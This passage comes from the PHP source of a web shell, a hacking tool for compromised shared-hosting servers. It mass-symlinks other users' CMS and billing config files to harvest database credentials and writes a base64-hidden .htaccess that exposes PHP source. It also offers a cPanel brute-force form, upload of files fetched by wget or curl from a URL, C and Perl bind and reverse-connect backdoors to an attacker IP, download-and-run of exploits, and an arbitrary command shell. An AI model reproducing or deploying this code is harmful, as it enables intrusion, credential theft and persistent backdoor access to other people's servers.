3583 symlink('/home4/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
3584 symlink('/home4/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
3585 symlink('/home4/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
3586 symlink('/home4/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
3587 symlink('/home4/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
3588 symlink('/home4/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
3589 symlink('/home4/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
3590 symlink('/home4/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
3591 symlink('/home4/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
3592 symlink('/home4/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
3593 symlink('/home4/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
3594 symlink('/home4/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
3595 symlink('/home4/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
3596 symlink('/home4/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
3597 symlink('/home4/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
3598 symlink('/home4/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
3599 symlink('/home4/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
3600 symlink('/home4/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
3601 symlink('/home4/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
3602 symlink('/home4/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
3603 symlink('/home4/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
3604 symlink('/home4/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
3605 symlink('/home4/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
3606 symlink('/home4/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
3607 symlink('/home5/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
3608 symlink('/home5/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
3609 symlink('/home5/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
3610 symlink('/home5/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
3611 symlink('/home5/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
3612 symlink('/home5/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
3613 symlink('/home5/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
3614 symlink('/home5/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
3615 symlink('/home5/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
3616 symlink('/home5/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
3617 symlink('/home5/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
3618 symlink('/home5/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
3619 symlink('/home5/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
3620 symlink('/home5/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
3621 symlink('/home5/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
3622 symlink('/home5/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
3623 symlink('/home5/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
3624 symlink('/home5/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
3625 symlink('/home5/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
3626 symlink('/home5/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
3627 symlink('/home5/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
3628 symlink('/home5/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
3629 symlink('/home5/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
3630 symlink('/home5/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
3631 symlink('/home5/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
3632 symlink('/home5/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
3633 symlink('/home5/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
3634 symlink('/home5/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
3635 symlink('/home5/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
3636 symlink('/home5/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
3637 symlink('/home6/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
3638 symlink('/home6/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
3639 symlink('/home6/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
3640 symlink('/home6/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
3641 symlink('/home6/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
3642 symlink('/home6/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
3643 symlink('/home6/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
3644 symlink('/home6/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
3645 symlink('/home6/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
3646 symlink('/home6/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
3647 symlink('/home6/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
3648 symlink('/home6/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
3649 symlink('/home6/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
3650 symlink('/home6/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
3651 symlink('/home6/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
3652 symlink('/home6/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
3653 symlink('/home6/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
3654 symlink('/home6/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
3655 symlink('/home6/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
3656 symlink('/home6/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
3657 symlink('/home6/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
3658 symlink('/home6/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
3659 symlink('/home6/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
3660 symlink('/home6/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
3661 symlink('/home6/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
3662 symlink('/home6/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
3663 symlink('/home6/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
3664 symlink('/home6/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
3665 symlink('/home6/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
3666 symlink('/home6/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
3667 symlink('/home7/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
3668 symlink('/home7/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
3669 symlink('/home7/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
3670 symlink('/home7/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
3671 symlink('/home7/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
3672 symlink('/home7/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
3673 symlink('/home7/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
3674 symlink('/home7/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
3675 symlink('/home7/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
3676 symlink('/home7/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
3677 symlink('/home7/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
3678 symlink('/home7/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
3679 symlink('/home7/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
3680 symlink('/home7/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
3681 symlink('/home7/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
3682 symlink('/home7/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
3683 symlink('/home7/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
3684 symlink('/home7/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
3685 symlink('/home7/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
3686 symlink('/home7/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
3687 symlink('/home7/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
3688 symlink('/home7/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
3689 symlink('/home7/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
3690 symlink('/home7/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
3691 symlink('/home7/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
3692 symlink('/home7/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
3693 symlink('/home7/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
3694 symlink('/home7/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
3695 symlink('/home7/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
3696 symlink('/home7/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
3697 }
3698
3699 $d0mains = @file("/etc/named.conf");
3700
3701 if($d0mains)
3702 {
3703 mkdir($fn);
3704 chdir($fn);
3705
3706 foreach($d0mains as $d0main)
3707 {
3708 if(eregi("zone",$d0main))
3709 {
3710 preg_match_all('#zone "(.*)"#', $d0main, $domains);
3711 flush();
3712
3713 if(strlen(trim($domains[1][0])) > 2)
3714 {
3715 $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
3716
3717 syml($user['name'],$domains[1][0]);
3718 }
3719 }
3720 }
3721 echo "<center><font color=lime size=3>Done</font></center>";
3722 echo "<br><center><a href=$fn/ target=_blank><font size=3 color=#009900>Here</font></a></center>";
3723 }
3724 else
3725 {
3726 mkdir($fn);
3727 chdir($fn);
3728 $temp = "";
3729 $val1 = 0;
3730 $val2 = 1000;
3731 for(;$val1 <= $val2;$val1++)
3732 {
3733 $uid = @posix_getpwuid($val1);
3734 if ($uid)
3735 $temp .= join(':',$uid)."\n";
3736 }
3737 echo '<br/>';
3738 $temp = trim($temp);
3739
3740 $file5 = fopen("test.txt","w");
3741 fputs($file5,$temp);
3742 fclose($file5);
3743
3744$htaccess =
3745'T3B0aW9ucyBhbGwgCkRpcmVjdG9yeUluZGV4IHJlYWRtZS5odG1sIApBZGRUeXBlIHRleHQvcGxh
3746aW4gLnBocCAKQWRkSGFuZGxlciBzZXJ2ZXItcGFyc2VkIC5waHAgCkFkZFR5cGUgdGV4dC9wbGFp
3747biAuaHRtbCAKQWRkSGFuZGxlciB0eHQgLmh0bWwgClJlcXVpcmUgTm9uZSAKU2F0aXNmeSBBbnk=
3748';
3749$file = fopen(".htaccess","w+");
3750$write = fwrite ($file ,base64_decode($htaccess));
3751
3752 $file = fopen("test.txt", "r") or exit("Unable to open file!");
3753 while(!feof($file))
3754 {
3755 $s = fgets($file);
3756 $matches = array();
3757 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
3758 $matches = str_replace("home/","",$matches[1]);
3759 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
3760 continue;
3761 syml($matches,$matches);
3762 }
3763 fclose($file);
3764 echo "</table>";
3765 unlink("test.txt");
3766 echo "<center><font color=lime size=3>Done</font></center>";
3767 echo "<br><center><a href=$fn/ target=_blank><font size=3 color=#009900>Here</font></a></center>";
3768 }
3769echo "<hr><center><b><a href=".$_SERVER['PHP_SELF'].">BACK</a>";
3770exit;
3771}
3772?>
3773<form method="POST" target="_blank">
3774<input name="page" type="hidden" value="find">
3775 <table border=1>
3776 <body bgcolor="black" text="white"><br><br>
3777
3778 <center><b><font size="5" style="italic" color="white">Cpanel BruteForce<br><br></b></center></td></tr>
3779 <tr>
3780 <td>
3781 <strong>User :</strong>
3782 </td>
3783 <td>
3784 <strong><textarea cols="79" style="background:black;outline:none;color:white;" rows="10" name="usernames"><?php system('ls /var/mail');?></textarea></strong>
3785 </td>
3786 <tr>
3787 <td>
3788 <strong>Pass :</strong>
3789 </td>
3790 <td>
3791 <strong><textarea cols="79" style="background:black;outline:none;color:white;" rows="10" name="passwords"></textarea></strong>
3792 </td>
3793 </tr>
3794 <tr>
3795 <td>
3796 <strong>Type :</strong>
3797 </td>
3798 <td>
3799 <span style="background:black;outline:none;color:white;"><strong>Simple : </strong> </span>
3800 <strong>
3801 <input type="radio" name="type" value="simple" checked="checked" class="style3"></strong>
3802 <font style="background:black;outline:none;color:white;"><strong>/etc/passwd : </strong> </font>
3803 <strong>
3804 <input type="radio" name="type" value="passwd" style="background:black;outline:none;color:white;"></strong><span class="style3"><strong>
3805 </strong>
3806 </span>
3807 <td style="background:black;outline:none;color:white;" >
3808 <strong><input class ='inputzbut' type="submit" value="START"></strong>
3809 </td>
3810 </tr>
3811 </table>
3812 <br>
3813 <table border=1>
3814 <tr>
3815 <td valign="top" style="background:black;outline:none;color:white;" >
3816 <strong>Get Config</strong>
3817 <br>
3818 <form method="POST" target="_blank">
3819 <strong>
3820<input name="mendapatkan" type="hidden" value="passwd" >
3821 </strong>
3822 <strong>Folder Name :</strong>
3823 <td>
3824
3825 <strong><input style="background:black;outline:none;color:white;" size="80" name="foldername" type="text"></strong>
3826 <td style="background:black;outline:none;color:white;" >
3827 <strong><input class ='inputzbut' type="submit" value="GO">
3828 </strong>
3829 </td>
3830 <tr>
3831</form>
3832<tr>
3833 <td style="background:black;outline:none;color:white;">
3834 <strong>Get Wordlist</strong>
3835<form method="POST" target="_blank">
3836 <strong>
3837<input name="pass" type="hidden" value="password">
3838 </strong>
3839 <strong>Url Config :</strong>
3840 <td>
3841
3842 <strong>
3843 <input style="background:black;outline:none;color:white;" size="80" name="url" type="text"></strong>
3844
3845 <td style="background:black;outline:none;color:white;"><strong><input class ='inputzbut' type="submit" value="GO">
3846 </strong>
3847 </td>
3848 <tr>
3849 <td style="background:black;outline:none;color:white;" colspan="6">
3850 <strong>Info Security</strong></td>
3851 </tr>
3852 <tr>
3853 <td style="background:black;outline:none;color:white;" style="width: 139px"><strong>Safe Mode</strong></td>
3854 <td style="background:black;outline:none;color:white;" colspan="5">
3855 <strong>
3856<?php
3857}
3858///
3859elseif(isset($_GET['x']) && ($_GET['x'] == 'about'))
3860 {
3861 ?>
3862 <form action="?y=<?php echo $pwd; ?>&x=about" method="post">
3863 <br><br><br><center>
3864 <br>Hai? :)<br>
3865 Gw cuma mau nanya, kenapa si cuma shell aja di taro logger?
3866 gak suka? contact : kapaljetz666@hotmail.com :)
3867<br>fuck you<br>
3868 </div>
3869<?php
3870}
3871//////////////////////////////////////////////////////////////////////////////
3872elseif(isset($_GET['x']) && ($_GET['x'] == 'upload')){
3873if(isset($_POST['uploadcomp'])){
3874 if(is_uploaded_file($_FILES['file']['tmp_name'])){
3875 $path = magicboom($_POST['path']);
3876 $fname = $_FILES['file']['name'];
3877 $tmp_name = $_FILES['file']['tmp_name'];
3878 $pindah = $path.$fname;
3879 $stat = @move_uploaded_file($tmp_name,$pindah);
3880 if ($stat) {
3881 $msg = "file uploaded to $pindah";
3882 }
3883 else $msg = "failed to upload $fname";
3884 }
3885 else $msg = "failed to upload $fname";
3886}
3887elseif(isset($_POST['uploadurl'])){
3888 $pilihan = trim($_POST['pilihan']);
3889 $wurl = trim($_POST['wurl']);
3890 $path = magicboom($_POST['path']);
3891 $namafile = download($pilihan,$wurl);
3892 $pindah = $path.$namafile;
3893 if(is_file($pindah)) {
3894 $msg = "file uploaded to $pindah";
3895 }
3896 else $msg = "failed to upload $namafile";
3897
3898}
3899?>
3900<form action="?y=<?php echo $pwd; ?>&x=upload" enctype="multipart/form-data" method="post">
3901<table class="tabnet" style="width:320px;padding:0 1px;">
3902<tr><th colspan="2">Upload from computer</th></tr>
3903<tr><td colspan="2"><p style="text-align:center;"><input style="color:#FFFF00;" type="file" name="file" /><input type="submit" name="uploadcomp" class="inputzbut" value="Go" style="width:80px;"></p></td>
3904<tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td></tr>
3905</tr>
3906</table></form>
3907<table class="tabnet" style="width:320px;padding:0 1px;">
3908<tr><th colspan="2">Upload from url</th></tr>
3909<tr><td colspan="2"><form method="post" style="margin:0;padding:0;" actions="?y=<?php echo $pwd; ?>&x=upload">
3910<table><tr><td>url</td><td><input class="inputz" type="text" name="wurl" style="width:250px;" value="http://www.some-code/exploits.c"></td></tr>
3911<tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td></tr>
3912<tr><td><select size="1" class="inputz" name="pilihan">
3913<option value="wwget">wget</option>
3914<option value="wlynx">lynx</option>
3915<option value="wfread">fread</option>
3916<option value="wfetch">fetch</option>
3917<option value="wlinks">links</option>
3918<option value="wget">GET</option>
3919<option value="wcurl">curl</option>
3920</select></td><td colspan="2"><input type="submit" name="uploadurl" class="inputzbut" value="Go" style="width:246px;"></td></tr></form></table></td>
3921</tr>
3922</table>
3923<div style="text-align:center;margin:2px;"><?php echo $msg; ?></div>
3924<?php }
3925elseif(isset($_GET['x']) && ($_GET['x'] == 'netsploit')){
3926
3927// bind connect with c
3928if (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'C')) {
3929 $port = trim($_POST['port']);
3930 $passwrd = trim($_POST['bind_pass']);
3931 tulis("bdc.c",$port_bind_bd_c);
3932 exe("gcc -o bdc bdc.c");
3933 exe("chmod 777 bdc");
3934 @unlink("bdc.c");
3935 exe("./bdc ".$port." ".$passwrd." &");
3936 $scan = exe("ps aux");
3937 if(eregi("./bdc $por",$scan)){ $msg = "<p>Process found running, backdoor setup successfully.</p>"; }
3938 else { $msg = "<p>Process not found running, backdoor not setup successfully.</p>"; }
3939}
3940// bind connect with perl
3941elseif (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'Perl')) {
3942 $port = trim($_POST['port']);
3943 $passwrd = trim($_POST['bind_pass']);
3944 tulis("bdp",$port_bind_bd_pl);
3945 exe("chmod 777 bdp");
3946 $p2=which("perl");
3947 exe($p2." bdp ".$port." &");
3948 $scan = exe("ps aux");
3949 if(eregi("$p2 bdp $port",$scan)){ $msg = "<p>Process found running, backdoor setup successfully.</p>"; }
3950 else { $msg = "<p>Process not found running, backdoor not setup successfully.</p>"; }
3951}
3952// back connect with c
3953elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'C')) {
3954 $ip = trim($_POST['ip']);
3955 $port = trim($_POST['backport']);
3956 tulis("bcc.c",$back_connect_c);
3957 exe("gcc -o bcc bcc.c");
3958 exe("chmod 777 bcc");
3959 @unlink("bcc.c");
3960 exe("./bcc ".$ip." ".$port." &");
3961 $msg = "Now script try connect to ".$ip." port ".$port." ...";
3962}
3963// back connect with perl
3964elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'Perl')) {
3965 $ip = trim($_POST['ip']);
3966 $port = trim($_POST['backport']);
3967 tulis("bcp",$back_connect);
3968 exe("chmod +x bcp");
3969 $p2=which("perl");
3970 exe($p2." bcp ".$ip." ".$port." &");
3971 $msg = "Now script try connect to ".$ip." port ".$port." ...";
3972}
3973elseif (isset($_POST['expcompile']) && !empty($_POST['wurl']) && !empty($_POST['wcmd']))
3974{
3975 $pilihan = trim($_POST['pilihan']);
3976 $wurl = trim($_POST['wurl']);
3977 $namafile = download($pilihan,$wurl);
3978 if(is_file($namafile)) {
3979
3980 $msg = exe($wcmd);
3981 }
3982 else $msg = "error: file not found $namafile";
3983}
3984
3985?>
3986<table class="tabnet">
3987<tr><th>Port Binding</th><th>Connect Back</th><th>Load and Exploit</th></tr>
3988<tr>
3989<td>
3990<table>
3991<form method="post" action="?y=<?php echo $pwd; ?>&x=netsploit">
3992<tr><td>Port</td><td><input class="inputz" type="text" name="port" size="26" value="<?php echo $bindport ?>"></td></tr>
3993<tr><td>Password</td><td><input class="inputz" type="text" name="bind_pass" size="26" value="<?php echo $bindport_pass; ?>"></td></tr>
3994<tr><td>Use</td><td style="text-align:justify"><p><select class="inputz" size="1" name="use"><option value="Perl">Perl</option><option value="C">C</option></select>
3995<input class="inputzbut" type="submit" name="bind" value="Bind" style="width:120px"></td></tr></form>
3996</table>
3997</td>
3998<td>
3999<table>
4000<form method="post" action="?y=<?php echo $pwd; ?>&x=netsploit">
4001<tr><td>IP</td><td><input class="inputz" type="text" name="ip" size="26" value="<?php echo ((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1")); ?>"></td></tr>
4002<tr><td>Port</td><td><input class="inputz" type="text" name="backport" size="26" value="<?php echo $bindport; ?>"></td></tr>
4003<tr><td>Use</td><td style="text-align:justify"><p><select size="1" class="inputz" name="use"><option value="Perl">Perl</option><option value="C">C</option></select>
4004<input type="submit" name="backconn" value="Connect" class="inputzbut" style="width:120px"></td></tr></form>
4005</table>
4006</td>
4007<td>
4008<table>
4009<form method="post" action="?y=<?php echo $pwd; ?>&x=netsploit">
4010<tr><td>url</td><td><input class="inputz" type="text" name="wurl" style="width:250px;" value="www.some-code/exploits.c"></td></tr>
4011<tr><td>cmd</td><td><input class="inputz" type="text" name="wcmd" style="width:250px;" value="gcc -o exploits exploits.c;chmod +x exploits;./exploits;"></td>
4012</tr>
4013<tr><td><select size="1" class="inputz" name="pilihan">
4014<option value="wwget">wget</option>
4015<option value="wlynx">lynx</option>
4016<option value="wfread">fread</option>
4017<option value="wfetch">fetch</option>
4018<option value="wlinks">links</option>
4019<option value="wget">GET</option>
4020<option value="wcurl">curl</option>
4021</select></td><td colspan="2"><input type="submit" name="expcompile" class="inputzbut" value="Go" style="width:246px;"></td></tr></form>
4022</table>
4023</td>
4024</tr>
4025</table>
4026<div style="text-align:center;margin:2px;"><?php echo $msg; ?></div>
4027<?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'shell')){ ?>
4028<form action="?y=<?php echo $pwd; ?>&x=shell" method="post">
4029<table class="cmdbox">
4030<tr><td colspan="2">
4031<textarea class="output" readonly>
4032<?php
4033if(isset($_POST['submitcmd'])) {
4034 echo @exe($_POST['cmd']);
4035}
4036?>
4037</textarea>
4038<tr><td colspan="2"><?php echo $prompt; ?><input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:60%;" value="" /><input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:12%;" /></td></tr>
4039</table>
4040</form>
4041<?php }
4042else {
4043if(isset($_GET['delete']) && ($_GET['delete'] != "")){
4044 $file = $_GET['delete'];
4045 @unlink($file);
4046}
4047elseif(isset($_GET['fdelete']) && ($_GET['fdelete'] != "")){
4048 @rmdir(rtrim($_GET['fdelete'],DIRECTORY_SEPARATOR));
4049}
4050elseif(isset($_GET['mkdir']) && ($_GET['mkdir'] != "")){
4051 $path = $pwd.$_GET['mkdir'];
4052 @mkdir($path);
4053}
4054 $buff = showdir($pwd,$prompt);
4055 echo $buff;
4056}
4057?>
4058
4059<br>
4060<br>
4061<center>
4062<br><center><br><br><div class="info"># ALL SYSTEM JUST TOYS #</div><br>
4063<div class="jaya"><b>
4064</body>
4065</html>
4066</html>